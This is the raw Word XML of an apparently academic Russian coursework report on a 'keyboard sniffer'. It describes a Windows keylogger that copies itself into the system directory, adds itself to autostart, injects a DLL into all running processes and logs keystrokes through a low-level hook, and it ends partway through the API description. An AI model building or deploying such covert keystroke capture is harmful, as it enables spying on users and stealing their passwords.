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6832EA" w:rsidRDefault="009C1400" w:rsidP="006832E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</w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="-30285570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p w:rsidR="006832EA" w:rsidRDefault="006832EA">
          <w:pPr>
            <w:pStyle w:val="a5"/>
          </w:pPr>
        </w:p>
        <w:p w:rsidR="006832EA" w:rsidRDefault="00683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42590" w:history="1">
            <w:r w:rsidRPr="006832EA">
              <w:rPr>
                <w:rStyle w:val="a3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591" w:history="1">
            <w:r w:rsidRPr="005F1CA7">
              <w:rPr>
                <w:rStyle w:val="a3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1CA7">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:b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592" w:history="1">
            <w:r w:rsidRPr="005F1CA7">
              <w:rPr>
                <w:rStyle w:val="a3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1CA7">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:b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593" w:history="1">
            <w:r w:rsidRPr="005F1CA7">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1 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594" w:history="1">
            <w:r w:rsidRPr="005F1CA7">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2 Назначения и цели программного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 w:rsidP="006832EA">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
            </w:tabs>
            <w:ind w:left="0"/>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="006832EA">
            <w:rPr>
              <w:rStyle w:val="a3"/>
              <w:noProof/>
              <w:u w:val="none"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t xml:space="preserve">    </w:t>
          </w:r>
          <w:hyperlink w:anchor="_Toc419842595" w:history="1">
            <w:r w:rsidRPr="005F1CA7">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3 Требования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596" w:history="1">
            <w:r w:rsidRPr="005F1CA7">
              <w:rPr>
                <w:rStyle w:val="a3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1CA7">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>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597" w:history="1">
            <w:r w:rsidRPr="005F1CA7">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1 Способ взаимодействия пользователя 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598" w:history="1">
            <w:r w:rsidRPr="005F1CA7">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2 Структурная схема программы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599" w:history="1">
            <w:r w:rsidRPr="005F1CA7">
              <w:rPr>
                <w:rStyle w:val="a3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1CA7">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:b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00" w:history="1">
            <w:r w:rsidRPr="005F1CA7">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.1 Процедура установки хука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01" w:history="1">
            <w:r w:rsidRPr="005F1CA7">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2 Низкоуровневый хук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02" w:history="1">
            <w:r w:rsidRPr="005F1CA7">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.3 Процедура установки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03" w:history="1">
            <w:r w:rsidRPr="005F1CA7">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:b/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">5.4 </w:t>
            </w:r>
            <w:r w:rsidRPr="005F1CA7">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Процедура</w:t>
            </w:r>
            <w:r w:rsidRPr="005F1CA7">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:b/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005F1CA7">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>инжекции</w:t>
            </w:r>
            <w:r w:rsidRPr="005F1CA7">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:b/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005F1CA7">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:b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04" w:history="1">
            <w:r w:rsidRPr="005F1CA7">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.5 Процедура получения снимка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605" w:history="1">
            <w:r w:rsidRPr="005F1CA7">
              <w:rPr>
                <w:rStyle w:val="a3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1CA7">
              <w:rPr>
                <w:rStyle w:val="a3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606" w:history="1">
            <w:r w:rsidRPr="005F1CA7">
              <w:rPr>
                <w:rStyle w:val="a3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1CA7">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:b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607" w:history="1">
            <w:r w:rsidRPr="006832EA">
              <w:rPr>
                <w:rStyle w:val="a3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608" w:history="1">
            <w:r w:rsidRPr="006832EA">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:b/>
                <w:noProof/>
                <w:lang w:eastAsia="en-US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2609" w:history="1">
            <w:r w:rsidRPr="006832EA">
              <w:rPr>
                <w:rStyle w:val="a3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10" w:history="1">
            <w:r w:rsidRPr="005F1CA7">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Листинг кода исполняемого файла</w:t>
            </w:r>
            <w:r w:rsidRPr="005F1CA7">
              <w:rPr>
                <w:rStyle w:val="a3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9842611" w:history="1">
            <w:r w:rsidRPr="005F1CA7">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Листинг кода инжектируемой библиотеки</w:t>
            </w:r>
            <w:r w:rsidRPr="005F1CA7">
              <w:rPr>
                <w:rStyle w:val="a3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EA" w:rsidRDefault="006832EA">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="006832EA" w:rsidRDefault="006832EA" w:rsidP="006832E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586F70" w:rsidRDefault="00586F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E8372C" w:rsidRDefault="009C1400" w:rsidP="00E8372C">
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00586F70" w:rsidRDefault="00586F70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E8372C" w:rsidRDefault="00E8372C" w:rsidP="00205E97">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005478C2" w:rsidRPr="00E47FA2" w:rsidRDefault="005478C2" w:rsidP="00586F70">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc414805627"/>
      <w:bookmarkStart w:id="2" w:name="_Toc419842033"/>
      <w:bookmarkStart w:id="3" w:name="_Toc419842590"/>
      <w:r w:rsidRPr="00E47FA2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Введение</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3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586F70">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc419842034"/>
      <w:bookmarkStart w:id="5" w:name="_Toc419842591"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Обзор литературы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/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Pr="00F02139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  <w:r w:rsidR="00F02139" w:rsidRPr="00F02139">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[3]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</w:t>
      </w:r>
      <w:r w:rsidR="00F02139" w:rsidRPr="00F02139">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r w:rsidRPr="008F6440">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">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F02139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  <w:r w:rsidR="00F02139" w:rsidRPr="00F02139">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[5]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Pr="00F02139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  <w:r w:rsidR="00F02139" w:rsidRPr="00F02139">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[5]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Pr="007E450A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  <w:r w:rsidR="00F02139" w:rsidRPr="007E450A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[3]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586F70" w:rsidRDefault="00E47FA2" w:rsidP="00586F70">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc419842592"/>
      <w:r w:rsidRPr="00586F70">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Техническое задание</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w:rsidR="00383DC8" w:rsidRPr="00586F70" w:rsidRDefault="00586F70" w:rsidP="00586F70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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:bookmarkStart w:id="7" w:name="_Toc419842593"/>
      <w:r w:rsidRPr="00586F70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83DC8" w:rsidRPr="00586F70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.1 Общие сведения.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w:rsidR="00383DC8" w:rsidRPr="00586F70" w:rsidRDefault="00383DC8" w:rsidP="00586F70">
      <w:pPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00586F70">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Название: «Сниффер клавиатуры». </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00383DC8" w:rsidRPr="00586F70" w:rsidRDefault="00383DC8" w:rsidP="00586F70">
      <w:pPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00586F70">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>«Сниффер клавиатуры» − программа для слежения за активностью пользователя.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00383DC8" w:rsidRPr="00586F70" w:rsidRDefault="00586F70" w:rsidP="00586F70">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0"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6F70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8" w:name="_Toc419842594"/>
      <w:r w:rsidRPr="00586F70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83DC8" w:rsidRPr="00586F70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.2 Назначения и цели программного средства.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w:rsidR="00383DC8" w:rsidRPr="00586F70" w:rsidRDefault="00383DC8" w:rsidP="00586F70">
      <w:pPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00586F70">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Назначения: программа предназначена для отслеживания нажатия клавиш на клавиатуре, а также отслеживания изменения активного окна. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00383DC8" w:rsidRPr="00586F70" w:rsidRDefault="00383DC8" w:rsidP="00586F70">
      <w:pPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00586F70"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Pr="00586F70" w:rsidRDefault="00586F70" w:rsidP="00586F70">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="0"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6F70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9" w:name="_Toc419842595"/>
      <w:r w:rsidRPr="00586F70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83DC8" w:rsidRPr="00586F70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.3 Требования к программному средству</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w:rsidR="00383DC8" w:rsidRPr="00586F70" w:rsidRDefault="00383DC8" w:rsidP="00586F70">
      <w:pPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00586F70"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 w:rsidRPr="00586F70">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>запускается</w:t>
      </w:r>
      <w:r w:rsidRPr="00586F70">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> пр</w:t>
      </w:r>
      <w:r w:rsidR="00FF48D5" w:rsidRPr="00586F70">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и загрузке компьютера и работает</w:t>
      </w:r>
      <w:r w:rsidRPr="00586F70"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586F70">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc419842596"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Системное проектирование</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w:rsidR="00205E97" w:rsidRDefault="00C949A2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205E97" w:rsidRPr="00ED07C6" w:rsidRDefault="00205E97" w:rsidP="00ED07C6">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc419842597"/>
      <w:r w:rsidRPr="00ED07C6">
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4.1 Способ взаимодействия пользователя и программы.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/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Pr="00ED07C6" w:rsidRDefault="00C8742B" w:rsidP="00ED07C6">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc419842598"/>
      <w:r w:rsidRPr="00ED07C6">
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4.2 Структурная схема программы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w:rsidR="00C8742B" w:rsidRDefault="00C8742B" w:rsidP="00C8742B">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF47AE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Работу программы можно разделить на бло</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ки, которые будут описаны далее.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C8742B" w:rsidRPr="00DF47AE" w:rsidRDefault="00C8742B" w:rsidP="00C8742B">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009456B2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4.2.1 Исполня</w:t>
      </w:r>
      <w:r w:rsidR="009456B2">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>емый файл</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B4BB4" w:rsidRDefault="002B4BB4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 xml:space="preserve">4.2.1.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Блок установки программы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B4BB4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установки программы исполняемый файл и рядом лежащая библиотек копируется из текущей директории в директорию операционной системы. И исполняемый файл заносится в автозагрузку.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B4BB4" w:rsidRDefault="002B4BB4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>4</w:t>
      </w:r>
      <w:r w:rsidRPr="002B50CE">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">.2.1.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="002B4BB4">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Блок инжекции библиотеки</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C203E3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момент выполнения программы создаетс</w:t>
      </w:r>
      <w:r w:rsidR="00C203E3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>я снимок всех текущих процессов. После чего во все процессы производится инжекция отслеживающей библиотеки.</w:t>
      </w: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C203E3" w:rsidRDefault="00C203E3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921EEF">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4.2.2 Инжектируемая библиотека</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E47FA2" w:rsidRPr="00205E97" w:rsidRDefault="00921EEF" w:rsidP="00546DFB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поток создает именованный мьютекс, если мьютекс уже был создан, то поток завершает работу. Далее поток создает лог-файл в заданной директории, в который будет записываться информация о активности пользователя. Устанавливается </w:t>
      </w:r>
      <w:r w:rsidR="00546DFB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>низкоуровневый хук, для отслеживания нажатия клавиш.</w:t>
      </w:r>
      <w:r w:rsidR="00C949A2" w:rsidRPr="00205E97">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">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586F70">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc419842599"/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  <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w:rsidR="000872BA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C63D18" w:rsidRPr="00ED07C6" w:rsidRDefault="00C63D18" w:rsidP="00ED07C6">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after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4" w:name="_Toc419842600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>5.1 Процедура</w:t>
      </w:r>
      <w:r w:rsidR="0072566D" w:rsidRPr="00ED07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установки хука</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14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872BA" w:rsidRPr="0095536E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95536E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0072566D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SetWindowsHookEx</w:t>
      </w:r>
      <w:r w:rsidRPr="0095536E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int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idHook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lpfn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hMod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dwThreadId</w:t>
      </w:r>
      <w:r w:rsidRPr="0095536E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определяемую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программой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процедуру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фильтра</w:t>
      </w:r>
      <w:r w:rsidRPr="0095536E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="0072566D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hook</w:t>
      </w:r>
      <w:r w:rsidRPr="0095536E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="000872BA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>в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цепочку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фильтров</w:t>
      </w:r>
      <w:r w:rsidRPr="0095536E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="0072566D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hook</w:t>
      </w:r>
      <w:r w:rsidRPr="0095536E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>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idHook </w:t>
      </w:r>
      <w:r w:rsidRPr="000872BA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">[in] Определяет тип устанавливаемой процедуры фильтра (hook).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Lpfn </w:t>
      </w:r>
      <w:r w:rsidRPr="00F97D6F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[in] Указатель на процедуру фильтра (hook). Если параметр dwThreadId равняется нулю или устанавливает идентификатор потока, созданного другим процессом, параметр lpfn должен указывать на процедуру фильтра (hook) в динамически подключаемой библиотеке (DLL). В противном случае, lpfn может указывать на процедуру фильтра (hook)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hMod </w:t>
      </w:r>
      <w:r w:rsidRPr="00F97D6F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[in] Дескриптор DLL, содержащий процедуры фильтра (hook), на которую указывает параметр lpfn.  параметр hMod должен быть установлен в ПУСТО (NULL), если  параметр dwThreadId устанавливает поток, созданный текущим процессом, и если процедура фильтра (hook) находится внутри кода, связанного с текущим процессом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0072566D" w:rsidRDefault="00F97D6F" w:rsidP="0072566D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dwThreadId </w:t>
      </w:r>
      <w:r w:rsidRPr="00F97D6F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[in] Устанавливает идентификатор потока с которым, процедура фильтра (hook) должна быть связана. Если этот параметр равняется нулю, процедура фильтра (hook) связывается со всеми существующими потоками, запущенными на том же самом рабочем столе, что и вызывающий поток.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D413B" w:rsidRPr="00ED07C6" w:rsidRDefault="000D413B" w:rsidP="00ED07C6">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="24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19842601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5.2 Низкоуровневый хук</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w:rsidR="00984B5C" w:rsidRDefault="00F97D6F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t>LRESULT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2E7A2E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E7A2E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LowLevelKeyboardHook</w:t>
      </w:r>
      <w:r w:rsidRPr="002E7A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вызывает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эту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функцию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каждый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раз</w:t>
      </w:r>
      <w:r w:rsidRPr="002E7A2E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F97D6F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>когда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собирается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вставить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новое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событие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клавиатуры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очередь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данных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потока</w:t>
      </w:r>
      <w:r w:rsidRPr="002E7A2E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F97D6F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ввод с клавиатуры может исходить от локального драйвера клавиатуры или от вызовов функции keybd_event.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0D413B" w:rsidRDefault="00984B5C" w:rsidP="000D413B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984B5C" w:rsidRPr="0095536E" w:rsidRDefault="000D413B" w:rsidP="000D413B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2355"/>
        </w:tabs>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D413B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2.1 </w:t>
      </w:r>
      <w:r w:rsidR="00984B5C" w:rsidRPr="000D413B">
        <w:rPr>
          <w:b/>
